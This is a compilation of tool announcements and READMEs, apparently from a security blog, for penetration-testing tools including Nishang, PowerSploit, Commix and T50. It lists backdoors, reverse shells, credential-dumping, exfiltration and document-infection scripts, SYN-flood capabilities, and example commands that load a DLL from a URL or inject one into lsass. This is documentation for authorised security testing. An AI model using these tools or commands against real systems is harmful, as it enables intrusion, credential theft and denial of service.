magictrain is A bandwidth measurement tool against bandwidth inflation attacks.
Requirement:
– libpcap-dev
– make gnu linux

Usage: ./mtrain [options] [IP or DNS of target prover]

magictrain is A bandwidth measurement tool against bandwidth inflation attacks.
Support All Linux Platform

Options:
-i iface name. Without -i, mtrain will find iface automatically
-e Train type. 0 is TIME_TRAIN, 1 is OF_TRAIN and 2 is SYN_TRAIN
-n How many trains used. Default is 3.
-s Train length. Default is 100.
-m 0=libpcap+rawSocket, 1=kernel+libnetfilter_queue.
Packet transmission method selection. Default is 0.
-d DEBUG info. enabled.
-o Enable output pcap.
-t For test supporting rate purpose only.
-r For RTT estimation only.
-p For packet pair measurement only.
-? Print HELP info..

Installation using git:

Magictrain File

git clone https://github.com/zpbrent/magictrain
sudo apt-get install libpcap-dev
cd magictrain
make

Sublist3r is python tool that is designed to enumerate subdomains of websites using search engines. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r currently supports the following search engines: Google, Yahoo, Bing, Baidu, and Ask. More search engines may be added in the future. Sublist3r also gathers subdomains using Netcraft and DNSdumpster.

subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.

Dependencies:
+ Requests library (http://docs.python-requests.org/en/latest/)
+ dnspython library (http://www.dnspython.org/)

Installation :

git clone https://github.com/aboul3la/Sublist3r.git

Install dependencies Ubuntu/Debian:
sudo apt-get install python-requests
sudo apt-get install python-dnspython

Install dependencies Centos/RedHat:
sudo yum install python-requests
sudo yum install python-dnspython
cd Sublist3r
python sublist3r.py -d facebook.com (example)

Source:https://github.com/aboul3la

BluPhish is a bluetooth device and service discovery tool that can be used for security assessment and penetration testing. BluPhish is written in Java, and relies on the Bluecove 2.1.1 API (http://bluecove.org/).

Execution:
Run the script run.script, which contains the following command:
java -cp .;bluecove-2.1.1-SNAPSHOT.jar BluPhish

The application will try to discover all the locally reachable bluetooth devices and services, attempt to connect to the services, and print their information.
The information about a service will have the following format: Device Name, Service Name, Connection URL, Requires Pairing, where:
+ Device Name is the user-friendly name given to the device.
+ Service Name is the name of the service discovered associated with the device.
+ Connection URL is an URL-formatted string that contains the connection type used by the service (BTSPP, BTL2CAP, BTGOEP), the address of the device, service port, and whether the servcie requires authentication, authorization and has to be master in the communication.
+ Requires Pairing says whether the application could connect to the service without pairing (generally meaning an unsafe connection could be made with the service). This value is irrelevant when the ‘–no-pair’ directive is provided to BluPhish.

An example output is the following:
iPhone | STRING Phonebook | btgoep://D896959D35B9:13;authenticate=false;encrypt=false;master=false | Yes

This output says that ‘iPhone’ has a service named ‘STRING Phonebook’ that connects through ‘btgoep’. The Bluetooth address of ‘iPhone’ is D896959D35B9, the service is listening to port 13, doesn’t require authentication nor encryption, and doesn’t have to be master. The service also requires explicit pairing between the device and another application attempting to connect to it, so it’s secure in that sense.
By default BluPhish will attempt to discover and pair with all the bluetooth services in order to probe for vulnerabilities. This will result in a pairing notification sent to the device.
In order to perform a non-pairing discovery, invoke BluPhish with the ‘–no-pair’ directive:

java -cp .;bluecove-2.1.1-SNAPSHOT.jar BluPhish –no-pair

Installation using git:

git clone https://github.com/olivo/BluPhish
cd BluePhish

Source : https://github.com/olivo

ISIP is a Interactive sip toolkit for packet manipulations, sniffing, man in the middle attacks, fuzzing, simulating of dos attacks.

Latest version v0.2, Changelog:
* Default message template(only register now)
* Specific show command
* New history menu
* Line parsing changes
* New command: load the pcap file
* New command: save the packets
* New command: parse the text file to packet
* New command: open the packets on wireshark
* Seperate cmd loops
* Fix: root problem
* Change directory structure

isip-v-0-2

Requirements:
– python 2.7.x
– python virtual env

Usage:
+ Packet manipulation tools are in packet cmd loop. First start, you are in the main cmd loop.

isip:main> packet
isip:packet>

+ Create a new sip packet with new command. If you don’t write name, isip create the packet named by message-{id}.

isip:packet> new
isip:packet> new r1

isip:packet> new
isip:packet> new r1

+ List the all created sip packets with list command.

isip:packet> list

isip:packet> list

+ Show properties of packets with show command. You can type ip, udp or sip with show command.

isip:packet> show message-1
isip:packet> show message-1 ip
isip:packet> show message-1 udp
isip:packet> show message-1 sip
isip:packet> show message-1 ip src
isip:packet> show message-1 udp sport
isip:packet> show message-1 sip uri
isip:packet> show message-1 sip headers.to

+ Set the random properties of packets with set command. You can use with random-headers-from, random-headers-to, random-headers-call-id, random-headers-max-forwards, random-headers-user-agent, random-headers-contact, random-headers-invite-cseq, random-headers-register-cseq commands.

isip> set message-1 ip src 12.12.12.12
isip> set message-1 udp sport 4545
isip> set message-1 sip method OPTIONS
isip> set message-1 sip headers.from "blabla"

+ Send the packet with send command.

isip:packet> set message-1 ip src random-ip
isip:packet> set message-1 udp sport random-port
isip:packet> set message-1 sip headers.from random-headers-from
isip:packet> set message-1 sip headers.to random-headers-to
isip:packet> set message-1 sip headers.contact random-headers-contact
isip:packet> set message-1 sip body random-data 50

+ Parse the text file to packet with parse command.

isip:packet> parse test/test1.txt r1

+ Load the packets from pcap file with load command. If you don’t write name, isip create the packet named by message-{id}.

isip:packet> load test.pcap r1
isip:packet> load test.pcap

+ Save the packets tp pcap file with save command. You can save the packet list just single command.

isip:packet> save r1 test.pcap
isip:packet> save r2 test.pcap # assume you have r2.0, r2.1, r2.2, r2.3 ...

+ Open the wireshark for packets with wireshark command.

isip:packet> wireshark r1
isip:packet> wireshark r2

isip:packet> wireshark r1
isip:packet> wireshark r2

+ List the history with hist command.

isip:packet> hist

Usage:

git clone https://github.com/halitalptekin/isip
cd
pip install -r equirements.txt
cd isip
python isip.py

Source : https://github.com/halitalptekin

Changelog v0.6.1:
+ Added Show-TargetScreen to the Gather directory.

DESCRIPTION
This script uses MJPEG to stream a target’s desktop in real time. It is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port.
A netcat listener which relays connection to a local port could be used as listener. A browser which supports MJPEG (Firefox) should then be pointed to the local port to see the remote desktop.

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.

Nishang v-0.6.1 released: PowerShell for penetration testing and offensive security.

Scripts; Nishang currently contains the following scripts and payloads.
+ Antak – the Webshell
– Antak :Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell

+ Backdoors
– HTTP-Backdoor : A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
– DNS_TXT_Pwnage : A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
– Execute-OnTime : A backdoor which can execute PowerShell scripts at a given time on a target.
– Gupt-Backdoor : A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
– Add-ScrnSaveBackdoor : A backdoor which can use Windows screen saver for remote command and script execution.
– Invoke-ADSBackdoor : A backdoor which can use alternate data streams and Windows Registry to achieve persistence.

+ Client
– Out-CHM : Create infected CHM files which can execute PowerShell commands and scripts.
– Out-Word : Create Word files and infect existing ones to run PowerShell commands and scripts.
– Out-Excel : Create Excel files and infect existing ones to run PowerShell commands and scripts.
– Out-HTA : Create a HTA file which can be deployed on a web server and used in phishing campaigns.
– Out-Java : Create signed JAR files which can be used with applets for script and command execution.
– Out-Shortcut : Create shortcut files capable of executing commands and scripts.
– Out-WebQuery : Create IQY files for phishing credentials and SMB hashes.

+ Escalation
– Enable-DuplicateToken : When SYSTEM privileges are required.
– Remove-Update : Introduce vulnerabilities by removing patches.

+ Execution
– Download-Execute-PS : Download and execute a PowerShell script in memory.
– Download_Execute : Download an executable in text format, convert it to an executable, and execute.
– Execute-Command-MSSQL : Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
– Execute-DNSTXT-Code : Execute shellcode in memory using DNS TXT queries.

+ Gather
– Check-VM : Check for a virtual machine.
– Copy-VSS : Copy the SAM file using Volume Shadow Copy Service.
– Invoke-CredentialsPhish : Trick a user into giving credentials in plain text.
– FireBuster FireListener: A pair of scripts for egress testing
– Get-Information : Get juicy information from a target.
– Get-LSASecret : Get LSA Secret from a target.
– Get-PassHashes : Get password hashes from a target.
– Get-WLAN-Keys: Get WLAN keys in plain text from a target.

+ Keylogger
Log keystrokes from a target.
– Invoke-MimikatzWdigestDowngrade: Dump user passwords in plain on Windows 8.1 and Server 2012
– Get-PassHints : Get password hints of Windows users from a target.

+ Pivot
– reate-MultipleSessions : Check credentials on multiple computers and create PSSessions.
– Run-EXEonRemote Copy and execute an executable on multiple machines.
– Invoke-NetworkRelay Create network relays between computers.

+ Prasadhak
– Prasadhak : Check running hashes of running process against the VirusTotal database.

+ Scan
– Brute-Force : Brute force FTP, Active Directory, MSSQL, and Sharepoint.
– Port-Scan : A handy port scanner

+ Powerpreter
Powerpreter : All the functionality of nishang in a single script module.

+ Shells :
– Invoke-PsGcat: Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent
– Invoke-PsGcatAgent: Execute commands and scripts sent by Invoke-PsGcat.
– Invoke-PowerShellTcp: An interactive PowerShell reverse connect or bind shell
– Invoke-PowerShellTcpOneLine : Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.
– Invoke-PowerShellUdp : An interactive PowerShell reverse connect or bind shell over UDP
– Invoke-PowerShellUdpOneLine : Stripped down version of Invoke-PowerShellUdp.
– Invoke-PoshRatHttps : Reverse interactive PowerShell over HTTPS.
– Invoke-PoshRatHttp : Reverse interactive PowerShell over HTTP.
– Remove-PoshRat : Clean the system after using Invoke-PoshRatHttps
– Invoke-PowerShellWmi : Interactive PowerShell using WMI.
– Invoke-PowerShellIcmp : An interactive PowerShell reverse shell over ICMP.

+ Utility:
– Add-Exfiltration: Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
– Add-Persistence: Add reboot persistence capability to a script.
– Remove-Persistence: Remote persistence added by the Add-Persistence script.
– Do-Exfiltration: Pipe (|) this to any script to exfiltrate the output.
– Download: Transfer a file to the target.
– Parse_Keys : Parse keys logged by the keylogger.
– Invoke-Encode : Encode and compress a script or string.
– Invoke-Decode : Decode and decompress a script or string from Invoke-Encode.
– Start-CaptureServer : Run a web server which logs Basic authentication and SMB hashes.
— [Base64ToString] [StringToBase64] [ExetoText] [TexttoExe]

Download : Nishang.zip(708 KB) | Our Post Before
Source : http://www.labofapenetrationtester.com/

Roadmap & Changelog
Version 0.3b [2015]:
+ Added: Support for Windows-based (cmd / powershell) payloads for every injection technique.

Version 0.2b [2015]:
+ Added: Support for recalling previous commands.
+ Added: Versions for “nongit” users (vx.xx-nongit-yyyymmdd).
+ Added: Support for a tab completion in shell options.
+ Added: Support for alternative (Python) os-shell in dynamic code evaluation (aka eval-based) technique.
+ Added: Support for PHP/Python meterpreter on “reverse_tcp” shell option.
+ Added: The “reverse_tcp” shell option.
+ Added: The ability to check for default root directories (Apache/Nginx).
+ Added: Support for removal of (txt) shell files (File-based/Tempfile-based).
+ Added: Support for JSON POST data.
+ Added: The “enumeration” and “file-read” results to log file.
+ Added: The ability to get the user’s approval before re-{enumerate/file-read} target.
+ Added: The ability to stop current injection technique and proceed on the next one(s).

Commix-0-3b

Commix (short for [com]mand [i]njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in Python programming language.

Commix v0.2b-7cc57eb
Example screenCapture Updates commix-v-0.1b : Automated All-in-One OS Command Injection and Exploitation Tool. Has been Tested on: Kali Sana, Windows 7/8.1/10, Debian, Ubuntu, Arch-Linux

Disclaimer :
The tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes!!

Command Injection Testbeds
A collection of pwnable VMs, that includes web apps vulnerable to command injections.
+ Damn Vulnerable Web App
+ OWASP: Mutillidae
+ bWAPP: bee-box (v1.6)
+ Persistence
+ Pentester Lab: Web For Pentester
+ Pentester Lab: CVE-2014-6271/Shellshock
+ Pentester Lab: Rack Cookies and Commands injection
+ Pentester Academy: Command Injection ISO: 1
+ SpiderLabs: MCIR (ShelLOL)
+ Kioptrix: Level 1.1 (#2)
+ Kioptrix: 2014 (#5)
+ Acid Server: 1
+ Flick: 2
+ w3af-moth
+ commix-testbed

Exploitation Demos:
+ Exploiting DVWA (1.0.8) command injection flaws.
+ Exploiting bWAPP command injection flaws (normal & blind).
+ Exploiting ‘Persistence’ blind command injection flaw.
+ Exploiting shellshock command injection flaws.
+ Upload a PHP shell (i.e. Metasploit PHP Meterpreter) on target host.
+ Upload a Weevely PHP web shell on target host.
+ Exploiting cookie-based command injection flaws.
+ Exploiting user-agent-based command injection flaws.
+ Exploiting referer-based command injection flaws.
+ Rack cookies and commands injection.

Usage

python commix.py [options]

Options:

-h, --help            Show help and exit.
--verbose             Enable the verbose mode.
--install             Install 'commix' to your system.
--version             Show version number and exit.
--update              Check for updates (apply if any) and exit.

Target:

This options has to be provided, to define the target URL.

--url=URL           Target URL.
--url-reload        Reload target URL after command execution.

Request:

These options can be used, to specify how to connect to the target
URL.

--method=METHOD     HTTP method (GET or POST).
--host=HOST         HTTP Host header.
--referer=REFERER   HTTP Referer header.
--user-agent=AGENT  HTTP User-Agent header.
--cookie=COOKIE     HTTP Cookie header.
--headers=HEADERS   Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
--proxy=PROXY       Use a HTTP proxy (e.g. '127.0.0.1:8080').
--auth-url=AUTH_..  Login panel URL.
--auth-data=AUTH..  Login parameters and data.
--auth-cred=AUTH..  HTTP Basic Authentication credentials (e.g.
                    'admin:admin').

Injection:

These options can be used, to specify which parameters to inject and
to provide custom injection payloads.

--param=PARAMETER   Parameter(s) to inject (use 'INJECT_HERE' tag).
--suffix=SUFFIX     Injection payload suffix string.
--prefix=PREFIX     Injection payload prefix string.
--technique=TECH    Specify a certain injection technique : 'classic',
                    'eval-based', 'time-based' or 'boolean-based'.
--maxlen=MAXLEN     The length of the output on time-based technique
                    (Default: 10000 chars).
--delay=DELAY       Set Time-delay for time-based and boolean-based
                    techniques (Default: 1 sec).
--base64            Use Base64 (enc)/(de)code trick to prevent false-
                    positive results.

Enumeration :

These options can be used, to enumerate the target host.

--current-user  Retrieve current user.
--hostname      Retrieve server hostname.
--is-root       Check if the current user have root privs

Installation:

git clone https://github.com/stasinopoulos/commix
cd commix
python commix.py -h (for helper)
python commix.py --update (for update)

Download : Master.zip | Clone Url
Source : https://github.com/stasinopoulos/ | Our post Before

RoadMap Changelog v-5.5:
Legend:
+ Added feature
* Improved/changed feature
– Bug fixed
! Known issue / missing feature

T50 5.5 – December 18th, 2015
+ Added experimental xorshift128+ pseudo random number generator routine.

T50 5.5 – December 1st, 2015
– The PRNG now generates 32 bit unsigned numbers.
* t50.c changed to main.c
T50 5.5 – February 3rd, 2015
! Changed the behavior of signals from RESTART to INTERRUPT.
* The raw socket is NON BLOCKING now.
! Improved command line parser: No more duplicated options accepted!
–protocol is case insensitive now.
– Add call to tcp_help() to usage().
* Support for RDRAND and BMI2 instruction set added.
– Small bug when calculating IP address on t50.c fixed
+ Added some “post-mortem” debug routines
* If sendto’s errno is EPERM, show permission error message asking to check firewall settings.
– Fixed bugs of modules memory allocations.
* Code compiles fine with LLVM clang 3.x;
* SSE is enabled by default in x86-64 architecture (commented on Makefile);
* Changed return type of module funcions;
* Small corrections on modules functions;
* All files were converted to UNIX text format;
* gre_encapsulation() was still not used on ospf.c;
– Calls to sendto with second parameter were wrong;
* Function ip_header() added to modules/ip.c.
– On embeded systems the use of VLAs (Variable Length Arrays) in modules functions can be hazardous
due to restricted stack space. “Differential” buffer reallocation on heap fix this problem;
* cksum() 5 times faster now (summing QWORDs, DWORDs WORDs and BYTES, in that order);
* Using a trick to deal with pointers of multiple types on modules functions;
* New Makefile (still needs some tweaks) for better incremental compiling;
* Minor fix on getOrdinalSuffix() function, no t50.c (11, 12 & 13 have a “th” suffix!).
+ Added comments with FIX, FIXME, NOTE prefix for better code reading.
* Changed the way modules table are declared. See modules.c for advice.
* Module table are not order dependant anymore!
* Created src/help directory and src/include/help.h header to improve module “modularity”.
* Host name now can be a partial IP or name, optionally followed by “/cidr”.
Partial IP have the format ‘a(.b(.c(.d)))’. Formats as ‘a.b./cidr’ are invalid.
! if a name or a full IP is given, the default cidr is 32. T50 will fail showing the message:
“CIDR must be between 8 and 30.”.
– CIDR bug above fixed by Fernando Mercês.
* socket descriptor isolated from anyone except sock.c.
* “modules” just manipulates the packet buffer. main() actually sends the packet.
* ‘stdout’ is now unbuffered on initialization. To avoid line buffer behavior oddities (if any).
* Added -std=gnu99 to CFLAGS, on Makefile.
! Possible wrong way to calculate threshold for turbo mode.
– Threshold bugs fixed.
! Possible wrong way to threat SIGCHLD signal.
– Added a SIGALRM handler and a timeout of 5 seconds when main process waits for child.

t50 the fastest packet injector.

T50 (f.k.a. F22 Raptor) is a tool designed to perform “Stress Testing”. The concept started on 2001, right after release ‘nb-isakmp.c’, and the main goal was:
– Having a tool to perform TCP/IP protocol fuzzer,  covering common regular
protocols, such as: ICMP, TCP and UDP.

Things  have  changed,  and the  T50 became a good unique resource capable to perform “Stress Testing”. And, after checking the “/usr/include/linux”,  some protocols were chosen to be part of its coverage:
a) ICMP   – Internet Control Message Protocol
b) IGMP   – Internet Group Management Protocol
c) TCP    – Transmission Control Protocol
d) UDP    – User Datagram Protocol

Why “Stress Testing”?  Well, because when people are  designing a new network infra-structure (eg. Datacenter serving to Cloud Computing) they think about:
a) High-Availability
b) Load Balancing
c) Backup Sites (Cold Sites, Hot Sites, and Warm Sites)
d) Disaster Recovery
e) Data Redundancy
f) Service Level Agreements
g) Etc…

But almost nobody thinks about “Stress Testing”, or even performs any test to check how the networks infra-structure behaves under stress,  under overload, and under attack.  Even during a Penetration Test,  people prefer not runningany kind of Denial-of-Service testing.  Even worse,  those people are missing one of the three key concepts of security that are common to risk management:
– Confidentiality
– Integrity
– AVAILABILITY

T50 was designed to perform “Stress Testing”  on a variety of infra-structure network devices (Version 2.45), using widely implemented protocols, and after some requests it was was re-designed to extend the tests (as of Version 5.3), covering some regular protocols (ICMP,  TCP  and  UDP),  some infra-structure specific protocols (GRE,  IPSec  and  RSVP), and some routing protocols (RIP, EIGRP and OSPF).

This new version (Version 5.3) is focused on internal infra-structure,  which allows people to test the availability of its resources, and cobering:
a) Interior Gateway Protocols (Distance Vector Algorithm):
1. Routing Information Protocol (RIP)
2. Enhanced Interior Gateway Routing Protocol (EIGRP)

b) Interior Gateway Protocols (Link State Algorithm):
1. Open Shortest Path First (OSPF)
c) Quality-of-Service Protocols:
1. Resource ReSerVation Protocol (RSVP).
d) Tunneling/Encapsulation Protocols:
1. Generic Routing Encapsulation (GRE).

T50 is a powerful and unique packet injector tool, which is capable to:
a) Send sequentially the following fifteen (15) protocols:
1. ICMP   – Internet Control Message Protocol
2. IGMPv1 – Internet Group Management Protocol v1
3. IGMPv3 – Internet Group Management Protocol v3
4. TCP    – Transmission Control Protocol
5. EGP    – Exterior Gateway Protocol
6. UDP    – User Datagram Protocol
7. RIPv1  – Routing Information Protocol v1
8. RIPv2  – Routing Information Protocol v2
9. DCCP   – Datagram Congestion Control Protocol
10. RSVP   – Resource ReSerVation Protocol
11. GRE    – Generic Routing Encapsulation
12. IPSec  – Internet Protocol Security (AH/ESP)
13. EIGRP  – Enhanced Interior Gateway Routing Protocol
14. OSPF   – Open Shortest Path First

b) It is the only tool capable to encapsulate the protocols  (listed above) within Generic Routing Encapsulation (GRE).
c) Send an (quite) incredible amount of  packets per second,  making  it  a   “second to none” tool:
-> More than 1,000,000 pps of SYN Flood  (+50% of the network uplink)  in
a 1000BASE-T Network (Gigabit Ethernet).
-> More than 120,000 pps of SYN Flood  (+60% of the network uplink)  in a 100BASE-TX Network (Fast Ethernet).
d) Perform “Stress Testing” on a variety of network infrastructure, network      devices and security solutions in place.
e) Simulate “Distributed Denial-of-Service” & “Denial-of-Service”  attacks, validating Firewall rules,  Router ACLs,  Intrusion Detection System and Intrusion Prevention System policies.

The main differentiator of the T50 is that it is able to send  all protocols, sequentially,  using one single SOCKET,   besides it is capable to be used to modify network routes,  letting IT Security Professionals performing advanced “Penetration Test”.

Installation:

git clone https://github.com/fredericopissarra/t50
cd t50
make
cd release
./t50
update cd <your Clone Folder>
git pull

Download :
t50-5-5-rc1.zip (119 KB)
t50-5-5-rc1.tar.gz (68 KB)
Master.zip  | Clone Url
Source : https://github.com/fredericopissarra | Our Post Before

New features in the latest update v1.0.16:
Dec 18, 2015:
+ Immunity Canvas plugin added
+ Added Dig plugin
+ Added Traceroute plugin
+ Fixed bug in first run of Faraday with log path and API errors
+ Added parametrization for port configuration on APIs
+ Refactor Plugin Base to update active WS name in var
+ Refactor Plugins to use current WS in temp filename under $HOME/.faraday/data. Affected Plugins:
— amap
— dnsmap
— nmap
— sslcheck
— wcscan
— webfuzzer
— nikto
+ Fixed bug get_installed_distributions from handler exceptions
+ Added Wiki information about running Faraday without configuring CouchDB
+ Fixed Unicode bug in Nexpose-full Plugin
+ Filter false-positives in Status Report
+ Fixed bug that prevented the use of “reports” and “cwe” strings in Workspace names
+ Added port to Service type target in new vuln modal
+ Added new scripts for faraday plugin:
/bin/delAllVulnsWith.py – delete all vulns that match a regex
/bin/getAllbySrv.py – get all IP addresses that have defined open port
/bin/getAllIpsNotServices.py added – get all IPs from targets without services
+ Fixed bug null last workspace
+ Fixed bugs in CSV export/import in QT

faraday-v1.0.16

Faraday introduces a new concept (IPE) Integrated Penetration-Test Environment a multiuser Penetration test IDE. Designed for distribution, indexation and analysis of the generated data during the process of a security audit.
The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

Collaborative Penetration Test and Vulnerability Management Platform

Designed for simplicity, users should notice no difference between their own terminal application and the one included in Faraday. Developed with a specialized set of functionalities that help users improve their own work. Do you remember yourself programming without an IDE? Well, Faraday does the same as an IDE does for you when programming, but from the perspective of a penetration test.

Installation:

git clone https://github.com/infobyte/faraday.git faraday-dev
cd faraday-dev
./install.sh

Start
./faraday.py

Update | Important
./faraday.py --update

Or

Download : v1.0.16.zip |  v1.0.16.tar.gz | Our Post Before
Source : http://www.faradaysec.com/

Changelog v3.0.0:
Features added:
+ PowerView and PowerUp!!! Moving forward this will be the home of these projects. Thank you @harmj0y for all the work that went in to integration and test writing!
+ Pester tests for PowerUp, PowerView, and the CodeExecution module. Full test coverage is desired but cannot be done in the interest of time, at the moment. Moving forward, all new code must be accompanied with Pester tests.
+ PowerSploit includes a .sln now for those who opt to develop PowerSploit in Visual Studio with the PowerShell Tools extension.

Enhancements:
+ Invoke-Mimikatz: It now uses the latest build of mimikatz 2.0 alpha (as of 12/14/2015)
+ Everything was normalized to ASCII for a consistent weaponization experience. A Pester test was written to ensure consistent, module-wide ASCII encoding.
+ I removed all versioning comments from functions. Versioning is to be maintained at the module level now.
+ Get-Keystrokes: Added a -PollingInterval parameter

Features/functionality removed:
+ Invoke-ShellcodeMSIL was removed. This was only ever designed as a PoC capability. Invoke-Shellcode and New-FunctionDelegate (in PowerShellArsenal) more than cover the functionality offered by Invoke-ShellcodeMSIL.
+ Invoke-Shellcode was modified. Metasploit integration was removed. See my blog post (http://www.exploit-monday.com/2015/12/offensive-tool-design-and-weaponization.html) which describes this rationale. The file hosting Invoke-Shellcode is no longer Invoke–Shellcode.ps1. I’m over my rage fit revolving around people downloading and executing code directly from GitHub repos.
+ Invoke-ReflectivePEInjection: Removed the -PEPath and -PEUrl parameters. It now only accepts a PE as a byte array.

Bug fixes:
+ Invoke-ReflectivePEInjection:
— Fixed a casting bug which was throwing errors.
— Added an option to not zero out the MZ signature. Clearing the PE signature prevents a PE from being loaded twice or more in succession.
— It was failing when trying to resolve NtCreateThreadEx which is not exported by ntdll.dll in Windows XP.
+ Invoke-Mimikatz:
— Invoke-Mimikatz was failing in Windows XP due to the embedded powerkatz.dll importing ntdll!_vscwprintf which doesn’t exist in Windows XP. It now works fine in Win XP.
+ Invoke-WmiCommand – Fixed some Windows XP and PowerShell v2 compatibility issues
+ Out-EncryptedScript – Hopefully fixed some decrypted output inconsistencies
+ Add-Persistence – Fixed a bug where sometimes the persisted payload was garbled in the profile script
+ Invoke-DllInjection – Fixed logic bug that would manifest itself in Windows XP.

PowerSploit-v-3-0-0-0

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid reverse engineers, forensic analysts, and penetration testers during all phases of an assessment.

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.

PowerSploit is comprised of the following modules and scripts:
+ CodeExecution; Execute code on a target machine.
— Invoke-DllInjection
— Invoke-ReflectivePEInjection
— Invoke-Shellcode
— Invoke-ShellcodeMSIL
— Watch-BlueScreen
+ ScriptModification; Modify and/or prepare scripts for execution on a compromised machine.
— Out-EncodedCommand
— Out-CompressedDll
— Out-EncryptedScript
— Remove-Comments
+ Persistence; Add persistence capabilities to a PowerShell script.
— New-UserPersistenceOptions
— New-ElevatedPersistenceOptions
— Add-Persistence
+ PETools; Parse/manipulate Windows portable executables.
— Get-PEHeader
— Get-ObjDump
— Get-DllLoadPath
+ Reverse Engineering; Tools to aid in reverse engineering.
— Get-PEB
— Get-ILDisassembly
— Get-NtSystemInformation
— Get-StructFromMemory
— Get-Member
— New-Object
— Get-Strings
— ConvertTo-String
— Get-MethodAddress
+ AntivirusBypass; AV doesn’t stand a chance against PowerShell!
— Find-AVSignature
+ Exfiltration; All your data belong to me!
— Get-Keystrokes
— Get-GPPPassword
— Get-TimedScreenshot
— Out-Minidump
+ Recon; Tools to aid in the reconnaissance phase of a penetration test.
— Invoke-Portscan
— Get-HttpStatus
— Invoke-ReverseDnsLookup
Recon\Dictionaries:
A collection of dictionaries used to aid in the reconnaissance phase of a penetration test. Dictionaries were taken from the following sources.
admin.txt – http://cirt.net/nikto2/
generic.txt – http://sourceforge.net/projects/yokoso/files/yokoso-0.1/
sharepoint.txt – http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/

Examples Syntax Images File Header

Synopsis PEBytes parameter:
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process, or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
please lead the Notes section (GENERAL NOTES) for information on how to use them.

1.)Reflectively loads a DLL or EXE in to memory of the Powershell process.
Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system, this will load and execute the DLL/EXE in to memory without writing any files to disk.
2.) Reflectively load a DLL in to memory of a remote process.
As mentioned above, the DLL being reflectively loaded won’t be displayed when tools are used to list DLLs of the running remote process. This is probably most useful for injecting backdoors in SYSTEM processes in Session0. Currently, you cannot retrieve output from the DLL. The script doesn’t wait for the DLL to complete execution, and doesn’t make any effort to cleanup memory in the remote process.

.DESCRIPTION
Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.
.PARAMETER PEPath
The path of the DLL/EXE to load and execute. This file must exist on the computer the script is being run on, not the remote computer.
.PARAMETER PEUrl
A URL containing a DLL/EXE to load and execute.
.PARAMETER PEBytes
A byte array containing a DLL/EXE to load and execute.
.PARAMETER ComputerName
Optional, an array of computernames to run the script on.
.PARAMETER FuncReturnType
Optional, the return type of the function being called in the DLL. Default: Void
Options: String, WString, Void. See notes for more information.
IMPORTANT: For DLLs being loaded remotely, only Void is supported.

.PARAMETER ExeArgs
Optional, arguments to pass to the executable being reflectively loaded.

.PARAMETER ProcName
Optional, the name of the remote process to inject the DLL in to. If not injecting in to remote process, ignore this.
.PARAMETER ProcId
Optional, the process ID of the remote process to inject the DLL in to. If not injecting in to remote process, ignore this.
.PARAMETER ForceASLR
Optional, will force the use of ASLR on the PE being loaded even if the PE indicates it doesn’t support ASLR. Some PE’s will work with ASLR even
if the compiler flags don’t indicate they support it. Other PE’s will simply crash. Make sure to test this prior to using. Has no effect when
loading in to a remote process.

.EXAMPLE
Load DemoDLL from a URL and run the exported function WStringFunc on the current system, print the wchar_t* returned by WStringFunc().
Note that the file name on the website can be any file extension.
Invoke-ReflectivePEInjection -PEUrl http://yoursite.com/DemoDLL.dll -FuncReturnType WString
.EXAMPLE
Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc().
Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName Target.local
.EXAMPLE
Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print
the wchar_t* returned by WStringFunc() from all the computers.
Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)
.EXAMPLE
Load DemoEXE and run it locally.
Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs “Arg1 Arg2 Arg3 Arg4”
.EXAMPLE
Load DemoEXE and run it locally. Forces ASLR on for the EXE.
Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs “Arg1 Arg2 Arg3 Arg4” -ForceASLR
.EXAMPLE
Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer.
Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local
.EXAMPLE
Load a PE from a byte array.
Invoke-ReflectivePEInjection -PEPath (Get-Content c:\DemoEXE.exe -Encoding Byte) -ExeArgs “Arg1 Arg2 Arg3 Arg4”

GENERAL NOTES:
The script has 3 basic sets of functionality:
1.) Reflectively load a DLL in to the PowerShell process
-Can return DLL output to user when run remotely or locally.
-Cleans up memory in the PS process once the DLL finishes executing.
-Great for running pentest tools on remote computers without triggering process monitoring alerts.
